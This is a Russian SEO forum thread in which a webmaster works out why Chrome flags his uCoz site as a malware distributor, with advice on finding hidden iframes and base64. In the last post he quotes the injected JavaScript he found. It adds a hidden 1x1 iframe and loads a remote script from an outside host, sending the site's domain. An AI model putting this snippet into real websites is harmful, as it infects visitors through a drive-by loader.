X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Google определил вредоносное ПО на сайте, хотя его там нет!
HanDi
HanDi
Topic Starter сообщение 13.11.2012, 18:09; Ответить: HanDi
Сообщение #1


Участник
***

Группа: User
Сообщений: 206
Регистрация: 2.1.2012
Поблагодарили: 41 раз
Репутация:   20  


Сабж. Как это произошло? Проверил весь код на сайте, все отдельные скрипты, модули, файлы, все страницы, проверил все.
Проверил сайт googlebot'ом, как посоветовал сам гугл.

Хотя гугл ругается на неизвестный сайт, типа:

Google Chrome заблокировал доступ к этой странице на сайте ***.ru
На эту веб-страницу было вставлено содержание с golop******.tk, известного распространителя вредоносного ПО. Ее посещение может привести к заражению вашего компьютера вредоносным ПО.


Заходил даже с оперы, с ИЕ - ничего.

Что это такое произошло?
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Proofer
Proofer
сообщение 13.11.2012, 18:11; Ответить: Proofer
Сообщение #2


Бывалый
****

Группа: User
Сообщений: 499
Регистрация: 5.11.2011
Поблагодарили: 101 раз
Репутация:   18  


(HanDi @ 13.11.2012, 20:09) *
Проверил весь код на сайте, все отдельные скрипты, модули, файлы, все страницы, проверил все.

Всё всё проверили? Iframe нет нигде? htaccess чист?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
HanDi
HanDi
Topic Starter сообщение 13.11.2012, 18:18; Ответить: HanDi
Сообщение #3


Участник
***

Группа: User
Сообщений: 206
Регистрация: 2.1.2012
Поблагодарили: 41 раз
Репутация:   20  


Сайт ucoz, посему htaccess - откидываем.
Iframe отсутствуют.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Belos
Belos
сообщение 13.11.2012, 18:21; Ответить: Belos
Сообщение #4


Старожил
******

Группа: Active User
Сообщений: 2478
Регистрация: 11.11.2008
Из: Украина
Поблагодарили: 702 раза
Репутация:   96  


base64 ?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
HanDi
HanDi
Topic Starter сообщение 13.11.2012, 18:31; Ответить: HanDi
Сообщение #5


Участник
***

Группа: User
Сообщений: 206
Регистрация: 2.1.2012
Поблагодарили: 41 раз
Репутация:   20  


Проверил на webmaster yandex - вредоносный код отсутствует.

Помоему это что-то гугл мудрит.

base64 тоже я думаю откидываем, у меня нет ничего зашифрованного в коде.
+ проверил все js файлы, обычно там что-то прячут.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Belos
Belos
сообщение 13.11.2012, 18:44; Ответить: Belos
Сообщение #6


Старожил
******

Группа: Active User
Сообщений: 2478
Регистрация: 11.11.2008
Из: Украина
Поблагодарили: 702 раза
Репутация:   96  


Но проверить то можно, что стоит то?!
Total Comander -> Alt+F7 + с текстом base64
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
HanDi
HanDi
Topic Starter сообщение 13.11.2012, 18:46; Ответить: HanDi
Сообщение #7


Участник
***

Группа: User
Сообщений: 206
Регистрация: 2.1.2012
Поблагодарили: 41 раз
Репутация:   20  


Разобрался, зря гнал на гугл.

Вопрос закрыт. Всем спасибо.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Belos
Belos
сообщение 13.11.2012, 18:48; Ответить: Belos
Сообщение #8


Старожил
******

Группа: Active User
Сообщений: 2478
Регистрация: 11.11.2008
Из: Украина
Поблагодарили: 702 раза
Репутация:   96  


Говорите уж, в чем причина была )))
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
seowolf
seowolf
сообщение 13.11.2012, 18:54; Ответить: seowolf
Сообщение #9


Бывалый
****

Группа: User
Сообщений: 286
Регистрация: 11.11.2012
Поблагодарили: 125 раз
Репутация:   16  


HanDi, бывают ломают хостера и закидывают массово всякие гадости, те в свою очередь как опомнятся - массово чистят все. Так что вы может прозевали шоутайм, посмотрите на время редактирования файлов через фтп. Гугль просто он шустрый малый, чуть что в барабаны, а яндекс и не успевает носом повести.

Блин, пока писал вопрос закрыли)) Итог то какой, в чем причина, ТС?

Сообщение отредактировал seowolf - 13.11.2012, 18:55


--------------------
Бутик драгоценных камней. Удивительные драгоценные камни.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
HanDi
HanDi
Topic Starter сообщение 13.11.2012, 18:54; Ответить: HanDi
Сообщение #10


Участник
***

Группа: User
Сообщений: 206
Регистрация: 2.1.2012
Поблагодарили: 41 раз
Репутация:   20  


Дело в том, что в 1 js файле, причем по размерам в самом большом, содержался самый маленький код, в котором был еще 1 iframe с еще 1 js файлом biggrin.gif

В общем в итоге код вредоносного ПО оказался такой:

/*ffb653*/
function AddBanner(b){var a = document.createElement('iframe'); a.src = b; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '1px'; a.style.width = '1px'; a.style.left = '1px'; a.style.top = '1px'; document.body.appendChild(a);}function XRequest(data){var script=document.createElement("script");script.type="text/javascript";if(script.readyState){script.onreadystatechange=function(){if(script.readyState=="loaded"||script.readyState=="complete"){script.onreadystatechange=null;}}}else{script.onload=function(){}}script.src=data;document.getElementsByTagName("head")[0].appendChild(script)}XRequest("http://*********.info/sex/banner.php?r=1&d="+document.domain);//debug:
/*/ffb653*/


Единственное не пойму, как могли загрузить этот код, если пароли не знает никто 100% и подобрать их не реально.

seowolf, это маловероятно.. обычно у ucoz такого не случалось.

Сообщение отредактировал HanDi - 13.11.2012, 18:55
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Как заставить Google любить тебя?
Хочу роста трафа из Гугла : ))
100 Aslan88 24648 Вчера, 2:38
автор: EconDude
Горячая тема (нет новых ответов) 10 бесплатных сервисов Google для бизнеса, о которых мало кто слышал
37 jack 11308 Вчера, 2:36
автор: EconDude
Открытая тема (нет новых ответов) Почему разнообразие на сайте вредит проекту?
23 Kiloan_Frost 1356 Вчера, 2:34
автор: EconDude
Открытая тема (нет новых ответов) Узнай все, о своем и чужом сайте
Выгрузка: Ahrefs+Semrush+Majestic+Spywords
7 matrixzp 1294 21.5.2018, 2:03
автор: matrixzp
Горячая тема (нет новых ответов) Ню фото на сайте фотографа
Раздел или отдельный сайт
29 Valerypantera 1492 20.5.2018, 17:02
автор: genjnat


 



RSS Текстовая версия Сейчас: 23.5.2018, 9:55
Дизайн